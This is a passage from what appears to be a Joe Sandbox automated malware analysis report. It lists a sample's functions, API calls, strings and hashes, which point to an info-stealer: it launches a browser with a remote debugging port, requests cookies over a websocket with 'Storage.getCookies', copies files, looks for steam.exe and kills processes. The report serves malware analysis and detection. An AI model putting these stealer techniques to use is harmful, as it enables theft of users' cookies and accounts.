                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 958055206-1862457068
                                • Opcode ID: 748f691bbb6c6bc26fe790ad85680d7739b2ca9c9c44f6fbe04ceb262f8ef2e7
                                • Instruction ID: f75b899a6761b14481a999f4b304dcd6129d7595cee0ca1e146a9dda14dd05b5
                                • Opcode Fuzzy Hash: 748f691bbb6c6bc26fe790ad85680d7739b2ca9c9c44f6fbe04ceb262f8ef2e7
                                • Instruction Fuzzy Hash: 1F9172B1A40218ABDB50EB64DC45FEE77B9FF48700F144199F609A7291DF70AE448FA4
                                Function 006BE210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 006BE22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 006BE243
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006BE263
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006BE27D
                                • wsprintfA.USER32 ref: 006BE2A2
                                • StrCmpCA.SHLWAPI(?,006CCFEC), ref: 006BE2B4
                                • wsprintfA.USER32 ref: 006BE2D1
                                  • Part of subcall function 006BEDE0: lstrcpy.KERNEL32(00000000,?), ref: 006BEE12
                                • wsprintfA.USER32 ref: 006BE2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 006BE304
                                • lstrcat.KERNEL32(?,0133F480), ref: 006BE335
                                • lstrcat.KERNEL32(?,006D1794), ref: 006BE347
                                • lstrcat.KERNEL32(?,?), ref: 006BE358
                                • lstrcat.KERNEL32(?,006D1794), ref: 006BE36A
                                • lstrcat.KERNEL32(?,?), ref: 006BE37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006BE394
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE422
                                • DeleteFileA.KERNEL32(?), ref: 006BE45C
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1557
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1579
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A159B
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A15FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006BE49B
                                • FindClose.KERNEL32(00000000), ref: 006BE4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: 7480e13432caf9463fcfac27f3d2e056fa0dbac2df626c05f86faf7da506963a
                                • Instruction ID: c1572c65b5d5dd94b5d4119821c74c91b633a9ae49361585f6b082669fe2f1f0
                                • Opcode Fuzzy Hash: 7480e13432caf9463fcfac27f3d2e056fa0dbac2df626c05f86faf7da506963a
                                • Instruction Fuzzy Hash: ED8161B1901219ABCB20EF65DC49EEE77BABF44300F044A99F54A97251EF35AE44CF90
                                Function 006A16B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A16E2
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A176C
                                • lstrcat.KERNEL32(00000000), ref: 006A1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A17A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A18FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: 74f6c2814685221ec19eed5fcae2b841cd7503cd6138a81f8f3fe1038437fb4e
                                • Instruction ID: a9bb9c72e9ce3ce990642e790c38926a38a74688c618df75211b8a03ad059635
                                • Opcode Fuzzy Hash: 74f6c2814685221ec19eed5fcae2b841cd7503cd6138a81f8f3fe1038437fb4e
                                • Instruction Fuzzy Hash: 73816D71A1121A9BCB21FF69D895AAFB7B6BF07700F040169F909AB261DB34DD01CF91
                                Function 006BDD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006BDD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006BDD4C
                                • wsprintfA.USER32 ref: 006BDD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 006BDD79
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006BDD9C
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006BDDB6
                                • wsprintfA.USER32 ref: 006BDDD4
                                • DeleteFileA.KERNEL32(?), ref: 006BDE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006BDDED
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1557
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1579
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A159B
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A15FF
                                  • Part of subcall function 006BD980: memset.MSVCRT ref: 006BD9A1
                                  • Part of subcall function 006BD980: memset.MSVCRT ref: 006BD9B3
                                  • Part of subcall function 006BD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BD9DB
                                  • Part of subcall function 006BD980: lstrcpy.KERNEL32(00000000,?), ref: 006BDA0E
                                  • Part of subcall function 006BD980: lstrcat.KERNEL32(?,00000000), ref: 006BDA1C
                                  • Part of subcall function 006BD980: lstrcat.KERNEL32(?,0133ED88), ref: 006BDA36
                                  • Part of subcall function 006BD980: lstrcat.KERNEL32(?,?), ref: 006BDA4A
                                  • Part of subcall function 006BD980: lstrcat.KERNEL32(?,0133D708), ref: 006BDA5E
                                  • Part of subcall function 006BD980: lstrcpy.KERNEL32(00000000,?), ref: 006BDA8E
                                  • Part of subcall function 006BD980: GetFileAttributesA.KERNEL32(00000000), ref: 006BDA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006BDE2E
                                • FindClose.KERNEL32(00000000), ref: 006BDE3D
                                • lstrcat.KERNEL32(?,0133F480), ref: 006BDE66
                                • lstrcat.KERNEL32(?,0133D900), ref: 006BDE7A
                                • lstrlen.KERNEL32(?), ref: 006BDE84
                                • lstrlen.KERNEL32(?), ref: 006BDE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BDED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: be1f9ffbda4660692548cf02d53a3f5a156a078c9430080ff61ab69a159c8885
                                • Instruction ID: b45cb1b7e7f737dff3b85d68587330b4d2f6075ade446f00b57f2111b7d55f33
                                • Opcode Fuzzy Hash: be1f9ffbda4660692548cf02d53a3f5a156a078c9430080ff61ab69a159c8885
                                • Instruction Fuzzy Hash: 3C6132B1A11209ABCB50EF74DC99AEE77BABF48300F0046A9F54597251EF34AE45CF50
                                Function 006BD530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 006BD54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 006BD564
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006BD584
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006BD59E
                                • lstrcat.KERNEL32(?,0133F480), ref: 006BD5E3
                                • lstrcat.KERNEL32(?,0133F430), ref: 006BD5F7
                                • lstrcat.KERNEL32(?,?), ref: 006BD60B
                                • lstrcat.KERNEL32(?,?), ref: 006BD61C
                                • lstrcat.KERNEL32(?,006D1794), ref: 006BD62E
                                • lstrcat.KERNEL32(?,?), ref: 006BD642
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BD682
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BD6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006BD737
                                • FindClose.KERNEL32(00000000), ref: 006BD746
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: b64236190eab4e1bae1d7b54c4642040aaca124ace46b84141e66fad94db2360
                                • Instruction ID: 7fed4d0d88bc4fa6c8c022b37ec79074c526a406ce3c2f74011fa8dfb228954d
                                • Opcode Fuzzy Hash: b64236190eab4e1bae1d7b54c4642040aaca124ace46b84141e66fad94db2360
                                • Instruction Fuzzy Hash: E46154B1911119ABCB20FF75DC89ADE77B9FF49300F0085A9E64997251EB34AE44CF90
                                Function 006C48B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: e894c17a5ec18263333d8e907b9e255a987f897f0b477b7789fb2140697dde13
                                • Instruction ID: c31bef5fd108a408f584868b96721389060f6ee3d4681df5a6b5a16495086669
                                • Opcode Fuzzy Hash: e894c17a5ec18263333d8e907b9e255a987f897f0b477b7789fb2140697dde13
                                • Instruction Fuzzy Hash: E0A23771D012699FDB60DFA8C890BEDBBB6EF48300F1481AAD519A7241DB716E85CF90
                                Function 006B23A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B2402
                                • lstrlen.KERNEL32(\*.*), ref: 006B240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006B2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 66eede253aa8cd3b6c51cc2331081c3673d9664cefbab39497944087a218d229
                                • Instruction ID: 009bf78ff93243b36e3bc006093e4b5e5a5253ffdebde27ae1179e0fbeb10076
                                • Opcode Fuzzy Hash: 66eede253aa8cd3b6c51cc2331081c3673d9664cefbab39497944087a218d229
                                • Instruction Fuzzy Hash: 90416BB06512178BCB72FF29DCA5ADE73E6BF12300F005169F94A97A21DB349C418F94
                                Function 006C46A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006C46B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 006C46C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C46DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 006C46ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C4702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 006C4711
                                • CloseHandle.KERNEL32(00000000), ref: 006C4718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C4726
                                • CloseHandle.KERNEL32(00000000), ref: 006C4731
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: bb0006f548c681a32b2e9b44a1deb18cb56f9b648630de1c97473d14c439bac7
                                • Instruction ID: 52304b18bf7ceb914921251dee529c7a1fc48634e4051b6a93bcca0885606de5
                                • Opcode Fuzzy Hash: bb0006f548c681a32b2e9b44a1deb18cb56f9b648630de1c97473d14c439bac7
                                • Instruction Fuzzy Hash: DC016D31602524ABE7219B65AC8DFFA377DFB49B11F04029AF949A2180EF749D848A71
                                Function 006C4610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 006C4628
                                • Process32First.KERNEL32(00000000,00000128), ref: 006C4638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 006C4660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C4672
                                • CloseHandle.KERNEL32(00000000), ref: 006C467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
